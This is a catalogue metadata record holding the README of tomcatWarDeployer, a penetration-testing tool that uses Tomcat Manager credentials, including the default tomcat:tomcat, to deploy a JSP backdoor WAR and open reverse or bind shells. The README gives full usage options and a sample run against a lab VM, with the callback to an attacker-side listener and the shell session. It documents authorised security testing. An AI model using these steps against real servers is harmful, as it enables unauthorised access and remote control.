{"id":13539399,"url":"https://github.com/mgeeky/tomcatwardeployer","last_synced_at":"2025-04-04T21:10:09.552Z","repository":{"id":8983511,"uuid":"60195401","full_name":"mgeeky/tomcatWarDeployer","owner":"mgeeky","description":"Apache Tomcat auto WAR deployment \u0026 pwning penetration testing tool.","archived":false,"fork":false,"pushed_at":"2024-03-31T16:43:38.000Z","size":231,"stargazers_count":425,"open_issues_count":5,"forks_count":130,"subscribers_count":16,"default_branch":"master","last_synced_at":"2025-03-28T20:09:17.873Z","etag":null,"topics":["backdoor","hacking","penetration","testing","tomcat"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mgeeky.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-06-01T16:57:48.000Z","updated_at":"2025-03-18T14:49:41.000Z","dependencies_parsed_at":"2024-10-25T05:26:57.684Z","dependency_job_id":"68c11777-9a96-4143-a466-19e9831c3dc4","html_url":"https://github.com/mgeeky/tomcatWarDeployer","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mgeeky%2FtomcatWarDeployer","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mgeeky%2FtomcatWarDeployer/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mgeeky%2FtomcatWarDeployer/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mgeeky%2FtomcatWarDeployer/ma
nifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mgeeky","download_url":"https://codeload.github.com/mgeeky/tomcatWarDeployer/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247249532,"owners_count":20908212,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","hacking","penetration","testing","tomcat"],"created_at":"2024-08-01T09:01:25.078Z","updated_at":"2025-04-04T21:10:09.531Z","avatar_url":"https://github.com/mgeeky.png","language":"Python","funding_links":["https://github.com/sponsors/mgeeky"],"categories":["\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"5dd93fbc2f2ebc8d98672b2d95782af3\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"2e40f2f1df5d7f93a7de47bf49c24a0e\"\u003e\u003c/a\u003e未分类-Pentest"],"readme":"## tomcatWarDeployer\nApache Tomcat auto WAR deployment \u0026 pwning penetration testing tool.\n\n### What is it?\nThis is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy a JSP backdoor, as well as invoke it afterwards and provide a nice shell (either via a web GUI, a listening port bound on the remote machine, or as a reverse TCP payload connecting back to the adversary). 
\n\nIn practice, it generates a JSP backdoor WAR package on the fly and deploys it through the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that the pentester provided (or custom ones; in the end, we all love *tomcat:tomcat*). \n\nThe tool offers a couple of handy features, like manager panel lookup logic, support for the CVE-2007-1860 double-encoding issue, and CSRF handling in newer Tomcats.\n\n### Usage\nAs simple as providing the server's address with port, as an IP:PORT pair. \nHere goes the help:\n\n```\nuser$ python tomcatWarDeployer.py --help\n\n    tomcatWarDeployer (v. 0.5)\n    Apache Tomcat auto WAR deployment \u0026 launching tool\n    Mariusz Banach / MGeeky '16\n\nPenetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.\n    \nUsage: tomcatWarDeployer.py [options] server\n\n  server    Specifies server address. Please also include port after colon.\n\nOptions:\n  -h, --help            show this help message and exit\n\n  General options:\n    -v, --verbose       Verbose mode.\n    -s, --simulate      Simulate breach only, do not perform any offensive\n                        actions.\n    -G OUTFILE, --generate=OUTFILE\n                        Generate JSP backdoor only and put it into specified\n                        outfile path then exit. Do not perform any\n                        connections, scannings, deployment and so on.\n    -U USER, --user=USER\n                        Tomcat Manager Web Application HTTP Auth username.\n                        Default=\"tomcat\"\n    -P PASS, --pass=PASS\n                        Tomcat Manager Web Application HTTP Auth password.\n                        Default=\"tomcat\"\n\n  Connection options:\n    -H RHOST, --host=RHOST\n                        Remote host for reverse tcp payload connection. When\n                        specified, RPORT must be specified too. 
Otherwise,\n                        bind tcp payload will be deployed listening on 0.0.0.0\n    -p PORT, --port=PORT\n                        Remote port for the reverse tcp payload when used with\n                        RHOST or Local port if no RHOST specified thus acting\n                        as a Bind shell endpoint.\n    -u URL, --url=URL   Apache Tomcat management console URL. Default:\n                        /manager/\n    -t TIMEOUT, --timeout=TIMEOUT\n                        Speciifed timeout parameter for socket object and\n                        other timing holdups. Default: 10\n\n  Payload options:\n    -R APPNAME, --remove=APPNAME\n                        Remove deployed app with specified name. Can be used\n                        for post-assessment cleaning\n    -X PASSWORD, --shellpass=PASSWORD\n                        Specifies authentication password for uploaded shell,\n                        to prevent unauthenticated usage. Default: randomly\n                        generated. Specify \"None\" to leave the shell\n                        unauthenticated.\n    -T TITLE, --title=TITLE\n                        Specifies head\u003etitle for uploaded JSP WAR payload.\n                        Default: \"JSP Application\"\n    -n APPNAME, --name=APPNAME\n                        Specifies JSP application name. Default: \"jsp_app\"\n    -x, --unload        Unload existing JSP Application with the same name.\n                        Default: no.\n    -C, --noconnect     Do not connect to the spawned shell immediately. By\n                        default this program will connect to the spawned\n                        shell, specifying this option let's you use other\n                        handlers like Metasploit, NetCat and so on.\n    -f WARFILE, --file=WARFILE\n                        Custom WAR file to deploy. 
By default the script will\n                        generate own WAR file on-the-fly.\n```\n\n\nAnd sample usage on [Kevgir 1 VM by canyoupwn.me](https://www.vulnhub.com/entry/kevgir-1,137/) running at 192.168.56.100:8080 :\n\n\n```\nuser$ python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080\n\n    tomcatWarDeployer (v. 0.3)\n    Apache Tomcat 6/7 auto WAR deployment \u0026 launching tool\n    Mariusz Banach / MGeeky '16\n\nPenetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.\n    \nINFO: Reverse shell will connect to: 192.168.56.102:4449.\nDEBUG: Browsing to \"http://192.168.56.100:8080/manager/\"... Creds: tomcat:tomcat\nDEBUG: Apache Tomcat Manager Application reached \u0026 validated.\nDEBUG: Generating JSP WAR backdoor code...\nDEBUG: Preparing additional code for Reverse TCP shell\nDEBUG: Generating temporary structure for jsp_app WAR at: \"/tmp/tmpDhzo9I\"\nDEBUG: Working with Java at version: 1.8.0_60\nDEBUG: Generating web.xml with servlet-name: \"JSP Application\"\nDEBUG: Generating WAR file at: \"/tmp/jsp_app.war\"\nDEBUG: added manifest\nadding: files/(in = 0) (out= 0)(stored 0%)\nadding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)\nadding: files/WEB-INF/web.xml(in = 547) (out= 253)(deflated 53%)\nadding: files/META-INF/(in = 0) (out= 0)(stored 0%)\nadding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)\nadding: index.jsp(in = 4684) (out= 1595)(deflated 65%)\nDEBUG: WAR file structure:\nDEBUG: /tmp/tmpDhzo9I\n├── files\n│   ├── META-INF\n│   │   └── MANIFEST.MF\n│   └── WEB-INF\n│       └── web.xml\n└── index.jsp\n\n3 directories, 3 files\nWARNING: Application with name: \"jsp_app\" is already deployed.\nDEBUG: Unloading existing one...\nDEBUG: Unloading application: \"http://192.168.56.100:8080/jsp_app/\"\nDEBUG: Succeeded.\nDEBUG: Deploying application: jsp_app from file: \"/tmp/jsp_app.war\"\nDEBUG: Removing temporary WAR directory: \"/tmp/tmpDhzo9I\"\nDEBUG: Succeeded, 
invoking it...\nDEBUG: Spawned shell handling thread. Awaiting for the event...\nDEBUG: Awaiting for reverse-shell handler to set-up\nDEBUG: Establishing listener for incoming reverse TCP shell at 192.168.56.102:4449\nDEBUG: Socket is binded to local port now, awaiting for clients...\nDEBUG: Invoking application at url: \"http://192.168.56.100:8080/jsp_app/\"\nDEBUG: Adding 'X-Pass: oHI9mPB0mOnZ' header for shell functionality authentication.\nDEBUG: Incoming client: 192.168.56.100:54251\nINFO: JSP Backdoor up \u0026 running on http://192.168.56.100:8080/jsp_app/\nINFO: Happy pwning. Here take that password for web shell: 'oHI9mPB0mOnZ'\nDEBUG: Connected with the shell: tomcat7@canyoupwnme\njh\ntomcat7@canyoupwnme $ id\nuid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)\n\ntomcat7@canyoupwnme $ exit\n\n```\n\nThe program sets up a local listener for the reverse-shell connection on the 192.168.56.102:4449 host (the local host), as in the example above. Then, after invoking the JSP backdoor, it automatically connects with the local listener, resulting in a shell being popped. One can also skip the `-H` parameter to go with the _bind shell_ functionality, where, rather than setting up a local listener, the program connects to the remotely listening bind shell.\n\nFinally, the above invocation results in the following JSP application, accessible remotely via the web:\n\n![JSP backdoor gui](screen1.png)\n\n\nAs one can see, a password is needed to leverage the deployed backdoor, thus preventing unauthenticated access during the assessment.\n\n\nSumming up, the user has spawned a web application providing a web backdoor, authenticated via a POST 'password' parameter that can be specified by the user or randomly generated by the program. Then, upon receiving the *X-Pass* header in the invocation phase, the application spawned a reverse connection to our *netcat* handler. 
The HTTP header is required here so that a user refreshing the web GUI does not keep re-triggering the bind or reverse connection. It also means that authentication is needed to reach that code.\n\nThat would be all, I guess. \n\n### TESTED\n* Apache Tomcat/5.5.35\n* Apache Tomcat/6.?\n* Apache Tomcat/7.0.52\n* Apache Tomcat/7.0.56\n* Apache Tomcat/8.0.33\n\n\n### CHANGELOG\n* 19.07.16: Version 0.3: Added bind-shell \u0026 reverse-shell functionality to provide the user with direct access to the shell.\n* 12.09.16: Version 0.3.3: Added support for the Tomcat 5 interface\n* 21.12.17: Quick fix for the http/https issue and avoiding SSL certificate validation.\n* 04.05.18: Enhanced the web interface a bit, added colors to the shell prompt and improved support for the Windows shell loop.\n* 31.08.18: Added support for CSRF and JSESSIONID handling in Tomcat 7+ versions and for CVE-2007-1860; you can check how it works automatically out-of-the-box on [PentesterLab](https://pentesterlab.com/exercises/cve-2007-1860)\n\n\n### TODO\n* ~~Implement bind \u0026 reverse tcp payload functionality as well as some pty to interact with it~~\n* ~~Finish implementing noconnect and connect functionality~~\n* Implement some sort of communication authentication and encryption/encoding, to prevent the flow of plain-text data through the wire/ether\n* Test it on ~~tomcat5~~, ~~tomcat8~~\n\n\n---\n\n### ☕ Show Support ☕\n\nThis and other projects are the outcome of sleepless nights and **plenty of hard work**. If you like what I do and appreciate that I always give back to the community,\n[Consider buying me a coffee](https://github.com/sponsors/mgeeky) _(or better a beer)_ just to say thank you! 
💪 \n\n---\n\n### Author\n\n```   \n   Mariusz Banach / mgeeky, 21\n   \u003cmb [at] binary-offensive.com\u003e\n   (https://github.com/mgeeky)\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmgeeky%2Ftomcatwardeployer","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmgeeky%2Ftomcatwardeployer","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmgeeky%2Ftomcatwardeployer/lists"}